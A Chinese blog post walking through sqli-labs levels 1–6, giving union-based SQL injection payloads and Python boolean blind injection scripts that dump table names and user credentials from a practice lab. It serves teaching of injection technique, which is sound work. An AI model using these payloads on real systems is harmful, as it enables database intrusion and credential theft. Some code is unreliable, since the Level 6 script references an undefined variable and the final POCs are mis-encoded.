sqli-labs靶场(1-6关)

最新推荐文章于 2024-06-07 14:19:10 发布
最新推荐文章于 2024-06-07 14:19:10 发布
阅读量1.1k 收藏 15
点赞数 30
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lyy8910599download/article/details/135882959
版权

1、第一关

测试id=1

id=1'加一个引号报错,两个引号正常,应该是字符,还有回显

猜测字段长度

id=1' order by 3 --+

id=1' order by 4 --+

字段长度为三,接下来确定位置:id=1' and 1=2 union select 1,2,3 --+

查出库名,及版本号id=1' and 1=2 union select 1,database(),version() --+

接下来爆出所有表名

id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

猜测账号密码应该在users表中,爆出所有字段

id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

接下来爆出所有账号

id=1' and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+

2、第二关

id=1,加单引号报错,双引号不报错,应该也是数字型注入

select * from userswhere id=$id' limit 0,1报错

select * from userswhere id=$id limit 0,1不报错

,接下来和第一关一样

id=1 and 1=2 union select 1,2,3 --+ 猜测查询字段长度

id=1 and 1=2 union select 1,database(),version() --+ 查出库名,及版本号

id=1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名

id=1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段

id=1 and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号

3、第三关

id=1'时报错,看到有括号,应该给他闭合

id=1') --+

接下来和第一关差不多

id=1') and 1=2 union select 1,2,3 --+ 猜测查询字段长度

id=1') and 1=2 union select 1,database(),version() --+ 查出库名,及版本号

id=1') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名

id=1') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段

id=1') and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号

4、第四关

id=1"根据报错猜测应该是双引号加括号闭合

接下来步骤类似第一关

id=100") union select 1,2,3 --+ 猜测查询字段长度

id=100") union select 1,database(),version() --+ 查出库名,及版本号

id=100") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+ 爆出所有表名

id=100") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ 爆出所有字段

id=100") union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号

5、第五关

id=1显示如下

id=1'会报错

id=100不显示

初步猜测应该是布尔注入

先试试能否爆出数据库长度

id=1' and length(database())>0--+

初步判断数据库长度应该是8

接下来尝试爆库id=1 and substr(database(),1,1)="a" --+

一个位置一个位置爆

爆出第一个位置是s,8次就可爆出,也可以利用脚本爆库security

import requests


def get_database(po, cha):
    url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr(database(),{po},1)=\"{cha}\"%20--+"
    res = requests.get(url)
    content_length = len(res.text)
    if content_length == 704:
        print(cha)


if __name__ == '__main__':
    for po in [1, 2, 3, 4, 5, 6, 7, 8]:
        for cha in [chr(97 + i) for i in range(26)]:
            get_database(po, cha)

接下来爆出所有表名

id=1%27%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=\"{cha}\"%20--+
def get_all_tables(po, cha):
    url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=\"{cha}\"%20--+"
    res = requests.get(url)
    content_length = len(res.text)
    if content_length == 704:
        if cha == ',':
            print("==========================================================================")
        else:
            print(cha, end='')

if __name__ == '__main__':
    # 假设所有表名长度之和100
    list = [chr(97 + i) for i in range(26)]
    list2 = [","]+list
    for po in range(100):
        for cha in list2:
            get_all_tables(po, cha)

接着爆users表里的字段

http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=\"{cha}\"%20--+
def get_all_columns(po, cha):
    url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=\"{cha}\"%20--+"
    res = requests.get(url)
    content_length = len(res.text)
    if content_length == 704:
        if cha == ',':
            print(",", end='')
        else:
            print(cha, end='')


if __name__ == '__main__':
    # 假设所有字段名长度之和500
    list = [chr(97 + i) for i in range(26)]
    list2 = [","]+list
    for po in range(500):
        for cha in list2:
            get_all_columns(po, cha)

接下来就是爆出所有账号密码

http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=\"{cha}\"%20--+
def get_all_username_password(po, cha):
    url = f"http://sqli.labs/Less-5/?id=1%27%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=\"{cha}\"%20--+"
    res = requests.get(url)
    content_length = len(res.text)
    if content_length == 704:
        if cha == ',':
            print(",", end='')
        else:
            print(cha, end='')


if __name__ == '__main__':
    list = [chr(97 + i) for i in range(26)]
    list2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, ",", ">", "-"]+list #这里可以吧各种字符都加上
    for po in range(500):
        for cha in list2:
            get_all_username_password(po, cha)

6、第六关

http://sqli.labs/Less-6/?id=1"双引号报错

这关与第五关类似,只是单引号改成双引号,正确的反馈长度是702

先爆库

http://sqli.labs/Less-6/?id=1%22%20and%20substr(database(),{p},1)=%22{a}%22%20--+
def get_database_name(p, a):
    url = f"http://sqli.labs/Less-6/?id=1%22%20and%20substr(database(),{p},1)=%22{a}%22%20--+"
    res = requests.get(url)
    content_length = len(res.text)
    if content_length == 702:
        if cha == ',':
            print(",", end='')
        else:
            print(cha, end='')


if __name__ == '__main__':
    list = [chr(97 + i) for i in range(26)]
    list2 = [1, 2, 3, 4, 5, 6, 7, 8, 9, ",", ">", "-"]+list #这里可以吧各种字符都加上
    for po in range(20):
        for cha in list2:
            get_database_name(po, cha)

接下来步骤和第五关类似,只要把单引号改成双引号,返回内容长度改成702即可

%27是单引号,%22是双引号,%20是空格

爆表名POC:id=1%22%20and%20substr((select group_concat(table_name) from information_schema.tables where table_schema='security'),{po},1)=22%{cha}22%%20--+

爆users表里的字段POC:id=1%22%20and%20substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{po},1)=22%{cha}22%%20--+

爆出所有账号密码POC:id=1%22%20and%20substr((select group_concat(username,'>',password) from users),{po},1)=22%{cha}22%%20--+

沧海一粟@星火燎原
关注
  • 30
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs第一
qq_51366383的博客
12-06 451
一、sqli-labs第一 1、判断是字符型还是数字型 Id=2-1 与 id=2 结果相同就是字符型 2、判断闭合符 通过输入’和" 可以判断这的闭合符为’ 3、查询字段数量 字段数为3 4、确认占位信息 5、查看信息 数据库 表名 列名 数据 二、自己上课的笔记 一、有回显之联合注入 union select 加-1是前面是错的,才 页面回显位回显数据 条件:有回显,知道前表字段数 1、获取数据库名 select distinct table_schema from in
SQL注入:sqli-labs靶场(1-37
qq_68163788的博客
02-03 5868
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Sql-labs的第一
最新发布
繁星
06-07 617
Sql注入要求我们对数据库的结构要有一个大概的了解,这要就能更容易去操作!!!
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 3万+
【详细】 Sqli-labs1~65详解 解题思路+解题步骤+解析 详细,超级详细
Sqli-labs靶场第4详解[Sqli-labs-less-4]
m0_73615178的博客
02-19 396
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()
SQLI-labs-第四
weixin_54055099的博客
09-04 663
SQLI第四的思路跟步骤
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2 3 4 5 4 7 8 9 11 12 13 14 15 16 17 18 19 20 21 22 23 24 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs--第一
wyzhxhn的博客
11-05 462
sqli-labs靶场第一
sqli_labs第一
qq726232111的博客
08-11 1670
小萌新入坑,从sqli-labs开始搞起 Less-1 提示:测试时要使用英文模式下字符!!!!!!要仔细查看是否字符有误导致无法返回信息!!!!! 0x0 信息分析 搭建好环境后来到Less-1的页面查看页面提示信息并分析 此时可以看到给出的提示信息 Please input the ID as parameter with numeric value 翻译 请输入ID作为...
sqli-labs靶场第一
A_450的博客
12-12 901
sqli-labs靶场第一
渗透漏洞基础之sqli-labs第一
lbg685的博客
02-20 526
渗透漏洞超级基础之sqli-labs第一
sqli-labs第一的闯
qq_45154529的博客
01-05 2063
第一:单引号错误 SQL的注入最终是为了拿到数据库的文件或者数据。 刚进页面,显示需要输入id。 于是我们使用在地址栏后面加上 ?id=1 第二行的黄色字体是我自己添加的内容,表示被传入mysql执行的语句(方便我加深理解),绿色字体是正常显示的内容。 如果你也想要显示此语句,可以在安装目录下的此页面的php当中,加入这条语句 echo “$sql” 判断有无注入点: 老规矩:加上and 1=1;and 1=2,看一下回显有没有不同。没有!说明其在sql中不是单纯应用数值作为参数。
sqli-labs一第一详细步骤,新手打基础篇
qq_50956249的博客
03-21 577
5、查出数据库名称后,爆破表名,union 1,group_concat(table_name),3,…union 1,2,group_concat(column_name),…7、查出了具体的字段名,最后一步就是查出具体的数据了,union 1,2,group _concat(username,id,password) from users–+4、先查出使用的是哪个数据库,用database()函数,以及数据库版本信息,用version()函数。输入1’–+,有用户显示。输入 1,有用户显示。
sqli-labs第一详解 纯新手向 含原理
髣髴兮若轻云之蔽月
04-23 2353
Less-01 为方便初学者理解,更改了sqli-labs的源码,以显示sql语句 后期学习中需要自己推理 初始页面 在url后面用get传值id=1,随后能看到网页出现变化 如下图 不断更改上传id的值,会有不同的用户信息显示。 按递增顺序直到14为止, 即(1~14) 判断注入点是否存在且能否使用 一般使用单引号进行判断,加到url后面 出现报错 内容大致为LIMIT0,1附近有语法错误。 为什么要使用单引号进行判断 实际上,我们可以看到sql语句为 SELECT * FROM users
【1day】sqli-labs靶场,第一基础个人详解
zadaSS的博客
10-19 2038
新手入门的自我记录
sqli-labs靶场15
07-28
SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值